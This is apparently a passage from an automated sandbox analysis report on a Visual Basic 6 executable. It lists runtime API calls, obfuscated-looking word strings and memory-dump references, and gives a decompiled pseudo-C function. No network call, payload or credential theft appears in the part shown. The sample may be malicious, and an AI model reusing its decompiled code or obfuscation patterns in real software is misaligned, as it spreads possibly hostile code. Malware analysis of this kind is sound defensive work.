__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000038), ref: 004177A1
__vbaVar2Vec.MSVBVM60(?,?), ref: 004177C3
__vbaAryMove.MSVBVM60(?,?,?,?), ref: 004177D6
__vbaFreeVar.MSVBVM60(?,?,?,?), ref: 004177E1
__vbaNew2.MSVBVM60(00404358,00425010,004050BC), ref: 00417800
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041783C
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041785E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405098,00000200), ref: 004178AA
__vbaFreeObj.MSVBVM60(00000000,?,00405098,00000200), ref: 004178C4
#606.MSVBVM60(00000001,00000002), ref: 004178ED
__vbaStrMove.MSVBVM60(00000001,00000002), ref: 004178FA
__vbaStrCmp.MSVBVM60(004054F4,00000000,00000001,00000002), ref: 00417905
__vbaFreeStr.MSVBVM60(004054F4,00000000,00000001,00000002), ref: 0041791F
__vbaFreeVar.MSVBVM60(004054F4,00000000,00000001,00000002), ref: 0041792A
__vbaNew2.MSVBVM60(00405078,00425698,004054F4,00000000,00000001,00000002), ref: 00417958
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 004179BD
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,000000F8), ref: 00417A1F
__vbaStrMove.MSVBVM60(00000000,?,004050A8,000000F8), ref: 00417A52
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,000000F8), ref: 00417A5D
__vbaNew2.MSVBVM60(00405078,00425698), ref: 00417A7C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 00417AE1
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,00000130), ref: 00417B43
__vbaStrMove.MSVBVM60(00000000,?,004050A8,00000130), ref: 00417B76
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,00000130), ref: 00417B81
__vbaNew2.MSVBVM60(00404358,00425010), ref: 00417BA7
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417BE3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,00000178), ref: 00417C30
__vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 00417C55
__vbaNew2.MSVBVM60(00404358,00425010), ref: 00417C70
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417CAC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405098,00000048), ref: 00417CF3
__vbaNew2.MSVBVM60(00405078,00425698), ref: 00417D1A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,0000004C), ref: 00417D7F
__vbaStrVarMove.MSVBVM60(?,00000000,?), ref: 00417DB3
__vbaStrMove.MSVBVM60(?,00000000,?), ref: 00417DC0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405088,00000024), ref: 00417DFB
__vbaStrMove.MSVBVM60(00000000,?,00405088,00000024), ref: 00417E2B
__vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 00417E40
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 00417E66
__vbaFreeVar.MSVBVM60 ref: 00417E74
__vbaVarDup.MSVBVM60(004054F4,00000000,00000001,00000002), ref: 00417EA0
#553.MSVBVM60(?,00000002,004054F4,00000000,00000001,00000002), ref: 00417EB3
__vbaVarTstNe.MSVBVM60(00008002,?,?,00000002,004054F4,00000000,00000001,00000002), ref: 00417EDA
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008002,?,?,00000002,004054F4,00000000,00000001,00000002), ref: 00417EF6
#648.MSVBVM60(0000000A), ref: 00417F2F
__vbaFreeVar.MSVBVM60(0000000A), ref: 00417F41
#536.MSVBVM60(00000002,0000000A), ref: 00417F68
__vbaStrMove.MSVBVM60(00000002,0000000A), ref: 00417F72
__vbaFreeVar.MSVBVM60(00000002,0000000A), ref: 00417F7D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00404AF0,00000254), ref: 00417FC0
#583.MSVBVM60(?,?,?,?,004050BC), ref: 00417FE2
__vbaFpR8.MSVBVM60(?,?,?,?,004050BC), ref: 00417FE7
#546.MSVBVM60(?,?,?,?,?,004050BC), ref: 00418005
__vbaVarMove.MSVBVM60(?,?,?,?,?,004050BC), ref: 00418016
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,004050BC), ref: 00418024
#570.MSVBVM60(000000DE,000000FF,?,?,?,?,?,004050BC), ref: 0041803C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00404B20,000006F8), ref: 0041807B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00404B20,000006FC), ref: 0041813A
__vbaVarForInit.MSVBVM60(?,?,?,00000002,00000003,00000002), ref: 004181B5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00404B20,00000700), ref: 00418255
__vbaNew2.MSVBVM60(00404358,00425010), ref: 004182B4
__vbaObjSet.MSVBVM60(?,00000000), ref: 004182F0
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00405098,00000190), ref: 0041833D
__vbaFreeStr.MSVBVM60 ref: 0041837E
__vbaFreeObj.MSVBVM60 ref: 00418389
__vbaVarForNext.MSVBVM60(?,?,?), ref: 004183A7

Strings

Haemagglutinate, xrefs: 004163C0
antilopen, xrefs: 00416F6E
Ploceiform, xrefs: 004173F4
, xrefs: 004178D0
}, xrefs: 004183BF
Fastfrysnings3, xrefs: 00415573
Bestvningers, xrefs: 004173D2
berger, xrefs: 0041766C
Tartronylurea6, xrefs: 00417073
micropathological, xrefs: 0041753F
inversionernes, xrefs: 00415D5E
Livstiden, xrefs: 00415FB8
SKURKEN, xrefs: 004160C3
queenly, xrefs: 0041768E
karries, xrefs: 0041669D
UNDERWROUGHT, xrefs: 004157C7
reitemized, xrefs: 00415F96
Reaccept8, xrefs: 00415C0F
Homoneura, xrefs: 00415B02
TUBULATION, xrefs: 00414F1D
Grundbog1, xrefs: 00417715
SCENEFUNKTIONRENS, xrefs: 00415E69
Asarota, xrefs: 004176B0
Sidenummereringer, xrefs: 00415595
fabriksfremstil, xrefs: 004173B0
seedstalk, xrefs: 00417095
Lipoclasis6, xrefs: 0041764A
Mvres2, xrefs: 004157A5
AFSPOR, xrefs: 00417283
Fremadrettede, xrefs: 004157E9
Maoismes, xrefs: 0041697C
takstomraaderne, xrefs: 004162B3
TOLDBODS, xrefs: 00415468
CREEPERED, xrefs: 00415E8B
Unsenescent1, xrefs: 00415D1A
Coronize, xrefs: 00415D3C
Gamle, xrefs: 00416F2A
ATTACKMAN, xrefs: 00416D3C
Reechy, xrefs: 00416F4C
UDKOMMANDOERNES, xrefs: 004172A5
TABB, xrefs: 00415783
01/01/01, xrefs: 00417E80

Memory Dump Source

Source File: 00000000.00000002.374396224.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.374393124.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374417553.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374421574.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374425259.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Ary1CopyDeref$CheckHresult$New2$Move$List$CallLate$Chkstk$Error$#570#648System$#536#546#552#553#583#596#606#610#647#680AddrefInitNextRedimVar2
String ID: $01/01/01$AFSPOR$ATTACKMAN$Asarota$Bestvningers$CREEPERED$Coronize$Fastfrysnings3$Fremadrettede$Gamle$Grundbog1$Haemagglutinate$Homoneura$Lipoclasis6$Livstiden$Maoismes$Mvres2$Ploceiform$Reaccept8$Reechy$SCENEFUNKTIONRENS$SKURKEN$Sidenummereringer$TABB$TOLDBODS$TUBULATION$Tartronylurea6$UDKOMMANDOERNES$UNDERWROUGHT$Unsenescent1$antilopen$berger$fabriksfremstil$inversionernes$karries$micropathological$queenly$reitemized$seedstalk$takstomraaderne$}
API String ID: 1903932112-25405131
Opcode ID: 2ec1be9545a1ddb4d42457ebf952bc918aa655bab679ed2c67e796e49e32caac
Instruction ID: ef13080232d15fe563cb22e6bb40204d18e227924b08c070228afa864c86e8f0
Opcode Fuzzy Hash: 2ec1be9545a1ddb4d42457ebf952bc918aa655bab679ed2c67e796e49e32caac
Instruction Fuzzy Hash: C3830874A40629DFDB21EF50CC45BEDB7B4AB08308F5040EAE109B72A1CB795E85DF99

Uniqueness

Uniqueness Score: -1.00%

Function 00418566, Relevance: 116.0, APIs: 60, Strings: 6, Instructions: 518
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00418566(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int* _v16;
				void* _v28;
				void* _v44;
				void* _v48;
				short _v52;
				short _v56;
				long long _v64;
				short _v68;
				signed int _v76;
				char _v80;
				signed int _v84;
				void* _v88;
				char _v96;
				char _v104;
				intOrPtr _v112;
				char _v120;
				char _v128;
				char _v136;
				signed int _v144;
				char _v152;
				intOrPtr _v160;
				char _v168;
				void* _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				intOrPtr* _v244;
				signed int _v248;
				signed int _v252;
				intOrPtr* _v256;
				signed int _v260;
				signed int _v264;
				intOrPtr* _v268;
				signed int _v272;
				signed int _v276;
				intOrPtr* _v280;
				signed int _v284;
				signed int _v288;
				void* _t265;
				signed int _t268;
				signed int _t279;
				signed int _t284;
				char* _t288;
				signed int _t294;
				signed int _t299;
				signed int _t307;
				signed int _t312;
				short _t314;
				signed int _t320;
				signed int _t325;
				signed int _t331;
				signed int _t335;
				signed int _t338;
				signed int _t350;
				signed int _t355;
				short _t356;
				signed int _t359;
				char* _t361;
				void* _t391;
				void* _t393;
				signed int* _t394;
				signed int _t401;
				signed int _t419;
				long long _t420;

				_t394 = _t393 - 0xc;
				 *[fs:0x0] = _t394;
				L00401530();
				_v16 = _t394;
				_v12 = 0x401420;
				_v8 = 0;
				_t265 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401536, _t391);
				_push(0x405514);
				L00401746();
				_push(_t265);
				_push( &_v104);
				L004016B6();
				_v144 = 0x405520;
				_v152 = 0x8008;
				_push( &_v104);
				_t268 =  &_v152;
				_push(_t268);
				L00401704();
				_v192 = _t268;
				_t361 =  &_v104;
				L00401794();
				if(_v192 != 0) {
					_v128 = 0x80020004;
					_v136 = 0xa;
					_v112 = 0x80020004;
					_v120 = 0xa;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_t420 =  *0x401408;
					_push(_t361);
					_push(_t361);
					_v80 = _t420;
					asm("fld1");
					_push(_t361);
					_push(_t361);
					_v88 = _t420;
					asm("fld1");
					_push(_t361);
					_push(_t361);
					_v96 = _t420;
					L0040176A();
					_v64 = _t420;
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push(3);
					L004017A0();
					_t394 =  &(_t394[4]);
					if( *0x425698 != 0) {
						_v224 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v224 = 0x425698;
					}
					_v192 =  *_v224;
					_t350 =  *((intOrPtr*)( *_v192 + 0x14))(_v192,  &_v88);
					asm("fclex");
					_v196 = _t350;
					if(_v196 >= 0) {
						_v228 = _v228 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v192);
						_push(_v196);
						L004017B8();
						_v228 = _t350;
					}
					_v200 = _v88;
					_t355 =  *((intOrPtr*)( *_v200 + 0x68))(_v200,  &_v188);
					asm("fclex");
					_v204 = _t355;
					if(_v204 >= 0) {
						_v232 = _v232 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x4050a8);
						_push(_v200);
						_push(_v204);
						L004017B8();
						_v232 = _t355;
					}
					_t356 = _v188;
					_v68 = _t356;
					_t361 =  &_v88;
					L0040178E();
					_t419 =  *0x401418;
					L004016B0();
					_t359 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t356);
					asm("fclex");
					_v192 = _t359;
					_t401 = _v192;
					if(_t401 >= 0) {
						_v236 = _v236 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x404af0);
						_push(_a4);
						_push(_v192);
						L004017B8();
						_v236 = _t359;
					}
				}
				_v112 = 0x80020004;
				_v120 = 0xa;
				_v96 = 0x80020004;
				_v104 = 0xa;
				_push( &_v120);
				_push( &_v104);
				asm("fld1");
				_push(_t361);
				_push(_t361);
				_v76 = _t419;
				asm("fld1");
				_push(_t361);
				_push(_t361);
				_v84 = _t419;
				asm("fld1");
				_push(_t361);
				_push(_t361);
				 *_t394 = _t419;
				L004016AA();
				L004016EC();
				asm("fcomp qword [0x401410]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t401 == 0) {
					_v240 = _v240 & 0x00000000;
				} else {
					_v240 = 1;
				}
				_v192 =  ~_v240;
				_push( &_v120);
				_push( &_v104);
				_push(2);
				L004017A0();
				if(_v192 != 0) {
					if( *0x425698 != 0) {
						_v244 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v244 = 0x425698;
					}
					_v192 =  *_v244;
					_t320 =  *((intOrPtr*)( *_v192 + 0x14))(_v192,  &_v88);
					asm("fclex");
					_v196 = _t320;
					if(_v196 >= 0) {
						_v248 = _v248 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v192);
						_push(_v196);
						L004017B8();
						_v248 = _t320;
					}
					_v200 = _v88;
					_t325 =  *((intOrPtr*)( *_v200 + 0x58))(_v200,  &_v84);
					asm("fclex");
					_v204 = _t325;
					if(_v204 >= 0) {
						_v252 = _v252 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x4050a8);
						_push(_v200);
						_push(_v204);
						L004017B8();
						_v252 = _t325;
					}
					_v216 = _v84;
					_v84 = _v84 & 0x00000000;
					L00401752();
					L0040178E();
					_v96 = 0x80020004;
					_v104 = 0xa;
					_push( &_v104);
					L004016A4();
					L00401794();
					if( *0x425010 != 0) {
						_v256 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404358);
						L004017BE();
						_v256 = 0x425010;
					}
					_t331 =  &_v88;
					L004017C4();
					_v192 = _t331;
					_t335 =  *((intOrPtr*)( *_v192 + 0xe8))(_v192,  &_v188, _t331,  *((intOrPtr*)( *((intOrPtr*)( *_v256)) + 0x308))( *_v256));
					asm("fclex");
					_v196 = _t335;
					if(_v196 >= 0) {
						_v260 = _v260 & 0x00000000;
					} else {
						_push(0xe8);
						_push(0x405038);
						_push(_v192);
						_push(_v196);
						L004017B8();
						_v260 = _t335;
					}
					_t338 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, _v188);
					asm("fclex");
					_v200 = _t338;
					if(_v200 >= 0) {
						_v264 = _v264 & 0x00000000;
					} else {
						_push(0x254);
						_push(0x404af0);
						_push(_a4);
						_push(_v200);
						L004017B8();
						_v264 = _t338;
					}
					L0040178E();
				}
				_push(L"Unerrably");
				_push(L"Icositetrahedra9");
				_push( &_v104); // executed
				L0040169E(); // executed
				_v144 = _v144 & 0x00000000;
				_v152 = 0x8008;
				_push( &_v104);
				_t279 =  &_v152;
				_push(_t279);
				L00401704();
				_v192 = _t279;
				L00401794();
				if(_v192 != 0) {
					_push(0);
					_push(0);
					_push(1);
					L00401698();
					L00401752();
					_v96 = 0x80020004;
					_v104 = 0xa;
					_t314 =  &_v104;
					_push(_t314);
					L0040179A();
					_v56 = _t314;
					L00401794();
					_push(1);
					_push(L"Fluorskyldningernes4");
					L00401692();
				}
				_v144 = L"8/8/8";
				_v152 = 8;
				L004016F8();
				_push( &_v104);
				_push( &_v120);
				L0040168C();
				_v160 = 8;
				_v168 = 0x8002;
				_push( &_v120);
				_t284 =  &_v168;
				_push(_t284);
				L00401704();
				_v192 = _t284;
				_push( &_v120);
				_push( &_v104);
				_push(2);
				L004017A0();
				if(_v192 != 0) {
					_push( &_v104);
					L004016E0();
					L00401764();
					if( *0x425698 != 0) {
						_v268 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v268 = 0x425698;
					}
					_v192 =  *_v268;
					_t307 =  *((intOrPtr*)( *_v192 + 0x14))(_v192,  &_v88);
					asm("fclex");
					_v196 = _t307;
					if(_v196 >= 0) {
						_v272 = _v272 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v192);
						_push(_v196);
						L004017B8();
						_v272 = _t307;
					}
					_v200 = _v88;
					_t312 =  *((intOrPtr*)( *_v200 + 0xc0))(_v200,  &_v188);
					asm("fclex");
					_v204 = _t312;
					if(_v204 >= 0) {
						_v276 = _v276 & 0x00000000;
					} else {
						_push(0xc0);
						_push(0x4050a8);
						_push(_v200);
						_push(_v204);
						L004017B8();
						_v276 = _t312;
					}
					_v52 = _v188;
					L0040178E();
					_push(L"NEDGRAVEDES");
					L00401686();
				}
				_t288 = 0;
				if(0 != 0) {
					L00401680();
					if( *0x425698 != 0) {
						_v280 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405078);
						L004017BE();
						_v280 = 0x425698;
					}
					_v192 =  *_v280;
					_t294 =  *((intOrPtr*)( *_v192 + 0x14))(_v192,  &_v88);
					asm("fclex");
					_v196 = _t294;
					if(_v196 >= 0) {
						_v284 = _v284 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405068);
						_push(_v192);
						_push(_v196);
						L004017B8();
						_v284 = _t294;
					}
					_v200 = _v88;
					_t299 =  *((intOrPtr*)( *_v200 + 0xe0))(_v200,  &_v84);
					asm("fclex");
					_v204 = _t299;
					if(_v204 >= 0) {
						_v288 = _v288 & 0x00000000;
					} else {
						_push(0xe0);
						_push(0x4050a8);
						_push(_v200);
						_push(_v204);
						L004017B8();
						_v288 = _t299;
					}
					_v220 = _v84;
					_v84 = _v84 & 0x00000000;
					L00401752();
					L0040178E();
					_v144 = L"ANALCIMIC";
					_v152 = 8;
					L004016F8();
					_push(2);
					_t288 =  &_v104;
					_push(_t288);
					L0040167A();
					_v76 = _t419;
					L00401794();
				}
				asm("wait");
				_push(0x418e30);
				L00401740();
				L00401794();
				L00401740();
				L00401740();
				return _t288;
			}

0x00418569
0x00418578
0x00418584
0x0041858c
0x0041858f
0x00418596
0x004185a5
0x004185a8
0x004185ad
0x004185b2
0x004185b6
0x004185b7
0x004185bc
0x004185c6
0x004185d3
0x004185d4
0x004185da
0x004185db
0x004185e0
0x004185e7
0x004185ea
0x004185f8
0x004185fe
0x00418605
0x0041860f
0x00418616
0x0041861d
0x00418624
0x00418631
0x00418635
0x00418639
0x0041863a
0x00418640
0x00418641
0x00418642
0x00418645
0x00418647
0x00418648
0x00418649
0x0041864c
0x0041864e
0x0041864f
0x00418650
0x00418653
0x00418658
0x00418661
0x00418665
0x00418669
0x0041866a
0x0041866c
0x00418671
0x0041867b
0x00418698
0x0041867d
0x0041867d
0x00418682
0x00418687
0x0041868c
0x0041868c
0x004186aa
0x004186c2
0x004186c5
0x004186c7
0x004186d4
0x004186f6
0x004186d6
0x004186d6
0x004186d8
0x004186dd
0x004186e3
0x004186e9
0x004186ee
0x004186ee
0x00418700
0x0041871b
0x0041871e
0x00418720
0x0041872d
0x0041874f
0x0041872f
0x0041872f
0x00418731
0x00418736
0x0041873c
0x00418742
0x00418747
0x00418747
0x00418756
0x0041875d
0x00418761
0x00418764
0x00418769
0x0041876f
0x0041877d
0x00418780
0x00418782
0x00418788
0x0041878f
0x004187ae
0x00418791
0x00418791
0x00418793
0x00418798
0x0041879b
0x004187a1
0x004187a6
0x004187a6
0x0041878f
0x004187b5
0x004187bc
0x004187c3
0x004187ca
0x004187d4
0x004187d8
0x004187d9
0x004187db
0x004187dc
0x004187dd
0x004187e0
0x004187e2
0x004187e3
0x004187e4
0x004187e7
0x004187e9
0x004187ea
0x004187eb
0x004187ee
0x004187f3
0x004187f8
0x004187fe
0x00418800
0x00418801
0x0041880f
0x00418803
0x00418803
0x00418803
0x0041881e
0x00418828
0x0041882c
0x0041882d
0x0041882f
0x00418840
0x0041884d
0x0041886a
0x0041884f
0x0041884f
0x00418854
0x00418859
0x0041885e
0x0041885e
0x0041887c
0x00418894
0x00418897
0x00418899
0x004188a6
0x004188c8
0x004188a8
0x004188a8
0x004188aa
0x004188af
0x004188b5
0x004188bb
0x004188c0
0x004188c0
0x004188d2
0x004188ea
0x004188ed
0x004188ef
0x004188fc
0x0041891e
0x004188fe
0x004188fe
0x00418900
0x00418905
0x0041890b
0x00418911
0x00418916
0x00418916
0x00418928
0x0041892e
0x0041893b
0x00418943
0x00418948
0x0041894f
0x00418959
0x0041895a
0x00418962
0x0041896e
0x0041898b
0x00418970
0x00418970
0x00418975
0x0041897a
0x0041897f
0x0041897f
0x004189af
0x004189b3
0x004189b8
0x004189d3
0x004189d9
0x004189db
0x004189e8
0x00418a0d
0x004189ea
0x004189ea
0x004189ef
0x004189f4
0x004189fa
0x00418a00
0x00418a05
0x00418a05
0x00418a22
0x00418a28
0x00418a2a
0x00418a37
0x00418a59
0x00418a39
0x00418a39
0x00418a3e
0x00418a43
0x00418a46
0x00418a4c
0x00418a51
0x00418a51
0x00418a63
0x00418a63
0x00418a68
0x00418a6d
0x00418a75
0x00418a76
0x00418a7b
0x00418a82
0x00418a8f
0x00418a90
0x00418a96
0x00418a97
0x00418a9c
0x00418aa6
0x00418ab4
0x00418ab6
0x00418ab8
0x00418aba
0x00418abc
0x00418ac6
0x00418acb
0x00418ad2
0x00418ad9
0x00418adc
0x00418add
0x00418ae2
0x00418ae9
0x00418aee
0x00418af0
0x00418af5
0x00418af5
0x00418afa
0x00418b04
0x00418b17
0x00418b1f
0x00418b23
0x00418b24
0x00418b29
0x00418b33
0x00418b40
0x00418b41
0x00418b47
0x00418b48
0x00418b4d
0x00418b57
0x00418b5b
0x00418b5c
0x00418b5e
0x00418b6f
0x00418b78
0x00418b79
0x00418b84
0x00418b90
0x00418bad
0x00418b92
0x00418b92
0x00418b97
0x00418b9c
0x00418ba1
0x00418ba1
0x00418bbf
0x00418bd7
0x00418bda
0x00418bdc
0x00418be9
0x00418c0b
0x00418beb
0x00418beb
0x00418bed
0x00418bf2
0x00418bf8
0x00418bfe
0x00418c03
0x00418c03
0x00418c15
0x00418c30
0x00418c36
0x00418c38
0x00418c45
0x00418c6a
0x00418c47
0x00418c47
0x00418c4c
0x00418c51
0x00418c57
0x00418c5d
0x00418c62
0x00418c62
0x00418c78
0x00418c7f
0x00418c84
0x00418c89
0x00418c89
0x00418c8e
0x00418c92
0x00418c98
0x00418ca4
0x00418cc1
0x00418ca6
0x00418ca6
0x00418cab
0x00418cb0
0x00418cb5
0x00418cb5
0x00418cd3
0x00418ceb
0x00418cee
0x00418cf0
0x00418cfd
0x00418d1f
0x00418cff
0x00418cff
0x00418d01
0x00418d06
0x00418d0c
0x00418d12
0x00418d17
0x00418d17
0x00418d29
0x00418d41
0x00418d47
0x00418d49
0x00418d56
0x00418d7b
0x00418d58
0x00418d58
0x00418d5d
0x00418d62
0x00418d68
0x00418d6e
0x00418d73
0x00418d73
0x00418d85
0x00418d8b
0x00418d98
0x00418da0
0x00418da5
0x00418daf
0x00418dc2
0x00418dc7
0x00418dc9
0x00418dcc
0x00418dcd
0x00418dd2
0x00418dd8
0x00418dd8
0x00418ddd
0x00418dde
0x00418e12
0x00418e1a
0x00418e22
0x00418e2a
0x00418e2f

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 00418584
__vbaI4Str.MSVBVM60(00405514,?,?,?,?,00401536), ref: 004185AD
#698.MSVBVM60(?,00000000,00405514,?,?,?,?,00401536), ref: 004185B7
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 004185DB
__vbaFreeVar.MSVBVM60(00008008,?), ref: 004185EA
#680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A,00008008,?), ref: 00418653
__vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A,00008008,?), ref: 0041866C
__vbaNew2.MSVBVM60(00405078,00425698,?,?,?,00401536), ref: 00418687
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 004186E9
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,00000068), ref: 00418742
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,00000068), ref: 00418764
__vbaFpI4.MSVBVM60(00000000,?,004050A8,00000068), ref: 0041876F
__vbaHresultCheckObj.MSVBVM60(00000000,00401420,00404AF0,00000064), ref: 004187A1
#679.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,00008008,?), ref: 004187EE
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,00008008,?), ref: 004187F3
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 0041882F
__vbaNew2.MSVBVM60(00405078,00425698,?,?,00401536), ref: 00418859
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 004188BB
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,00000058), ref: 00418911
__vbaStrMove.MSVBVM60(00000000,?,004050A8,00000058), ref: 0041893B
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,00000058), ref: 00418943
#594.MSVBVM60(0000000A), ref: 0041895A
__vbaFreeVar.MSVBVM60(0000000A), ref: 00418962
__vbaNew2.MSVBVM60(00404358,00425010,0000000A), ref: 0041897A
__vbaObjSet.MSVBVM60(?,00000000), ref: 004189B3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405038,000000E8), ref: 00418A00
__vbaHresultCheckObj.MSVBVM60(00000000,00401420,00404AF0,00000254), ref: 00418A4C
__vbaFreeObj.MSVBVM60(00000000,00401420,00404AF0,00000254), ref: 00418A63
#692.MSVBVM60(?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418A76
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 00418A97
__vbaFreeVar.MSVBVM60(00008008,?), ref: 00418AA6
#706.MSVBVM60(00000001,00000000,00000000,00008008,?), ref: 00418ABC
__vbaStrMove.MSVBVM60(00000001,00000000,00000000,00008008,?), ref: 00418AC6
#648.MSVBVM60(0000000A,00000001,00000000,00000000,00008008,?), ref: 00418ADD
__vbaFreeVar.MSVBVM60(0000000A,00000001,00000000,00000000,00008008,?), ref: 00418AE9
#580.MSVBVM60(Fluorskyldningernes4,00000001,0000000A,00000001,00000000,00000000,00008008,?), ref: 00418AF5
__vbaVarDup.MSVBVM60(00008008,?), ref: 00418B17
#542.MSVBVM60(?,?,00008008,?), ref: 00418B24
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,00008008,?), ref: 00418B48
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,00008008,?), ref: 00418B5E
#546.MSVBVM60(?,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418B79
__vbaVarMove.MSVBVM60(?,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418B84
__vbaNew2.MSVBVM60(00405078,00425698,?,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418B9C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 00418BFE
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,000000C0), ref: 00418C5D
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,000000C0), ref: 00418C7F
#531.MSVBVM60(NEDGRAVEDES), ref: 00418C89
#598.MSVBVM60(?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418C98
__vbaNew2.MSVBVM60(00405078,00425698,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418CB0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405068,00000014), ref: 00418D12
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A8,000000E0), ref: 00418D6E
__vbaStrMove.MSVBVM60(00000000,?,004050A8,000000E0), ref: 00418D98
__vbaFreeObj.MSVBVM60(00000000,?,004050A8,000000E0), ref: 00418DA0
__vbaVarDup.MSVBVM60(00000000,?,004050A8,000000E0), ref: 00418DC2
#600.MSVBVM60(?,00000002), ref: 00418DCD
__vbaFreeVar.MSVBVM60(?,00000002), ref: 00418DD8
__vbaFreeStr.MSVBVM60(00418E30,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418E12
__vbaFreeVar.MSVBVM60(00418E30,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418E1A
__vbaFreeStr.MSVBVM60(00418E30,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418E22
__vbaFreeStr.MSVBVM60(00418E30,?,Icositetrahedra9,Unerrably,?,?,00401536), ref: 00418E2A

Strings

ANALCIMIC, xrefs: 00418DA5
NEDGRAVEDES, xrefs: 00418C84
Unerrably, xrefs: 00418A68
Fluorskyldningernes4, xrefs: 00418AF0
8/8/8, xrefs: 00418AFA
Icositetrahedra9, xrefs: 00418A6D

Memory Dump Source

Source File: 00000000.00000002.374396224.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.374393124.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374417553.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374421574.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374425259.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$List$#531#542#546#580#594#598#600#648#679#680#692#698#706Chkstk
String ID: 8/8/8$ANALCIMIC$Fluorskyldningernes4$Icositetrahedra9$NEDGRAVEDES$Unerrably
API String ID: 1573628273-1410073908
